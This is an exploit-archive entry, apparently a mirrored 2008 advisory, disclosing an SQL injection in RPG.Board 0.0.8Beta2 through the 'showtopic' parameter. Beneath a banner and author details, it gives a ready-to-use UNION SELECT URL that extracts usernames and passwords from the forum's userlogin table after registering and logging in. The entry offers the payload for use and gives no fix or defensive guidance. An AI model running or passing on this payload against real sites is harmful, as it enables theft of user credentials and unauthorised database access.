[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : RPG.Board <= 0.0.8Beta2 (showtopic) SQL Injection Vulnerability
# Published : 2008-09-26
# Author : 0x90
# Previous Title : The Gemini Portal (lang) Remote File Inclusion Vulnerabilities
# Next Title : AJ Auction Pro Platinum (seller_id) SQL Injection Vulnerability
_____ ____ _____ ____ _____ __ __ _____ ____
/ _ / / / _ / _ / ___| / _ / / / _ / _ |
| | | | / / ||_| | | | | | | | | | | | | __/ | | |_| | ||_|_|
| | | | / __ | | | | | | | | | | | | | | | | _ | |
| |_| | / __| | | |_| |/| |__ | |_| | | | | |/| | | | | |
_____/ / / |____/ _____//____| _____/ |_| |_|/|_| |_| |_| _|
/ /
[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: RPG.Board
[~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69
[~] Vulnerability Class: SQL Injection
[~] Exploit:
Register, login and testing exploit..
http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]userlogin
# www.Syue.com [2008-09-26]